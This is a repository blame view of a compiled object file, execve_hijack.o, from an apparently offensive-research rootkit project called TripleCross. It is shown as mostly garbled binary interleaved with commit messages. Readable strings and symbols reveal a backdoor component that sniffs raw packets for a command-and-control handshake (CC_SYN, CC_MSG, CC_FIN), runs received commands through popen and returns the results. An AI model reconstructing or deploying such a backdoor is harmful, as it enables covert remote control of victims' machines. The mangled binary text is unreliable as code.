admin/TripleCross
1
0
Fork 0
mirror of https://github.com/h3xduck/TripleCross.git synced 2025-12-21 17:23:07 +08:00
Code Issues Packages Projects Releases Wiki Activity
Files
0e022a838541b1714da06d6e6facc50863f76d33
TripleCross/src/helpers/execve_hijack.o

10 lines
5.9 KiB
Plaintext
Raw Normal View History

Completed execution of arbitrary commands sent from the backdoor client
2022-02-18 04:06:18 -05:00
ELF>@@ <00><1E>UH<55><48>H<EFBFBD><48>0H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>dH<64>%(H<>E<EFBFBD>1<EFBFBD><31><00><00>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>5H<><48><EFBFBD>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>u.H<>=<00>H<><00>jH<6A><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48>H<EFBFBD><48><EFBFBD>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<><48><EFBFBD>H<><48>u<EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48>H<EFBFBD>=<00><00>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>M<EFBFBD>dH+ %(t<05><00><><EFBFBD><1E>UH<55><48>H<EFBFBD><48>0dH<64>%(H<>E<EFBFBD>1<EFBFBD><31><00><00>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<><48><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>u
Finished pseudo-connection between client and rootkit backdoor. Updated library to latest version.
2022-02-18 03:32:07 -05:00
<EFBFBD><00>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>u
Completed execution of arbitrary commands sent from the backdoor client
2022-02-18 04:06:18 -05:00
<EFBFBD><00>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>@H<><00>8<EFBFBD>H<><48>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48>H<EFBFBD><48><EFBFBD>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>M<EFBFBD>dH+ %(t<05><00><><EFBFBD><1E>UH<55><48>H<EFBFBD><48>@<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>dH<64>%(H<>E<EFBFBD>1<EFBFBD>H<EFBFBD>=<00>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><EFBFBD>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Dž<EFBFBD><C785><EFBFBD><EFBFBD><00>=<3D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>H<EFBFBD><14>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<01>H<EFBFBD><10><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>=<00><00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><01><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;<3B><><EFBFBD><EFBFBD><EFBFBD>|<7C><><EFBFBD><00>BH<>=<00><00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Dž<EFBFBD><C785><EFBFBD><EFBFBD><00>0<EFBFBD><30><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Hc<48>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD> <02><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<>Ή<EFBFBD><CE89><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><01><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Hc<48>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<01><0F><00><>u<EFBFBD><75><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<>5<00><><EFBFBD>Dž<><C785><EFBFBD><EFBFBD><00>2H<32><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><10><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>H<EFBFBD> <02><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<>Ή<EFBFBD><CE89><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><10><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD>H<01><0F><00><>u<EFBFBD><75><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<>5<00><><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<><48> <20><><EFBFBD>H<EFBFBD>5H<><48><EFBFBD><00><00>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48> <20><><EFBFBD>H<EFBFBD>p H<>E<EFBFBD><45>H<>¿<00>H<><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48>H<EFBFBD>=<00><00>H<><48>P<EFBFBD><50><EFBFBD>H<EFBFBD>u<EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48>H<> QA<51>I<><49>H<EFBFBD>Ѻ(#<00>@H<><48><EFBFBD>H<><48>H<><48><08><>p<EFBFBD><70><EFBFBD><EFBFBD><EFBFBD>h<EFBFBD><68><EFBFBD><EFBFBD><EFBFBD>`<60><><EFBFBD><EFBFBD><EFBFBD>X<EFBFBD><58><EFBFBD><EFBFBD><EFBFBD>P<EFBFBD><50><EFBFBD><EFBFBD>H<><48>0<EFBFBD><30>y
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Dž<><C785><EFBFBD><EFBFBD><00><>H<>E<EFBFBD>H<EFBFBD>5H<><48><EFBFBD>H<>=<00>H<>E<EFBFBD>H<EFBFBD><48><00><><EFBFBD>H<EFBFBD><48><00><><EFBFBD>H<EFBFBD>5H<><48><EFBFBD>H<><48><08><><EFBFBD>H<EFBFBD>5<00><00>H<><48><08><><EFBFBD>H<EFBFBD><48><08><><EFBFBD><0F>>H<><48><08><><EFBFBD>H<EFBFBD>5H<><48><EFBFBD><00><>uH<>=<00>Dž<><C785><EFBFBD><EFBFBD><00> H<><48><08><><EFBFBD>H<EFBFBD><48>H<EFBFBD>=<00><00>H<><48><08><><EFBFBD>H<EFBFBD><48><EFBFBD>H<><48><10><><EFBFBD><EFBFBD><00><00>H<><48><18><><EFBFBD>H<EFBFBD><48><18><><EFBFBD>H<EFBFBD><48><EFBFBD>H<><48>H<EFBFBD><48><18><><EFBFBD>H<01>H<EFBFBD>CC_MSG#H<>H<><48><10><><EFBFBD>H<EFBFBD><48><18><><EFBFBD>H<EFBFBD><48>H<EFBFBD><48><EFBFBD>H<>E<EFBFBD>H<EFBFBD>M<EFBFBD>H<EFBFBD><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD>H<EFBFBD><48><08><><18><><EFBFBD>A<EFBFBD>I<><49>H<EFBFBD>Ѻ(#<00>@H<><48><EFBFBD>H<><48>H<><48><08>u<EFBFBD><75>u<EFBFBD><75>u<EFBFBD><75>u<EFBFBD><75>u<EFBFBD><75>H<><48>0<EFBFBD><30>y<07><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>0H<30><48><18><><EFBFBD>H<EFBFBD><48><EFBFBD>H<><48><10><><EFBFBD>H<EFBFBD><48><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><0F>H<EFBFBD><48><EFBFBD><EFBFBD>H<>M<EFBFBD>dH+ %(t<05><00><>rFailed to run commandCOMMAND ERRORRESULT OF COMMAND: %s
Hello world from execve hijackerArgument %i is %s
Updated my RawTCPLib library with newest version supporting sniffing for payloads. Also new data in preparation for complete RCE module
2022-02-16 19:38:39 -05:00
/tmp/execve_hijack
Finished pseudo-connection between client and rootkit backdoor. Updated library to latest version.
2022-02-18 03:32:07 -05:00
CC_SYNIP: %s
CC_ACKCC_MSG#Received client message#CC_FINConnection closed by requestReceived request: %s
Completed execution of arbitrary commands sent from the backdoor client
2022-02-18 04:06:18 -05:00
GCC: (Ubuntu 10.3.0-1ubuntu1) 10.3.0GNU<00>zRx <08><00>E<10>C <02> <<00>E<10>C <02> \<00>E<10>C <03> <00><><00>!7>DIPV]du<00><00><00><00><00><00><00><00><00><00><00><00><00>?<00>^<00><00><00> ")0execve_hijack.cexecute_command_GLOBAL_OFFSET_TABLE_callocpopenputsstrcatfgetsprintfpclose__stack_chk_failgetLocalIpAddressgethostnameexitgethostbynameinet_ntoastrcpymainlocaltimeasctimewriterawsocket_sniff_patterninet_ntopbuild_standard_packetrawsocket_sendstrtokstrcmpstrlenfree0<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>E<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>M<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>e<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>j<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>q<00> <00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>"<00> <00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>T<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>c<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>~<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><<00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>0<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>o]y <00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>p<00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>U<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00> <00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00>=<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>h<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00>  <00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><<00>F <00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>U<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>k<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>%"<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>4"<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Z <00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> @<00>`<00>.symtab.strtab.shstrtab.rela.text.data.bss.rodata.comment.note.GNU-stack.note.gnu.property.rela.eh_frame @`@<00> ` &<00>,<00>1<00><00>90<00>&B<00>R<00> j<00>xe@@H `H  <00> 5<00>t
Reference in New Issue Copy Permalink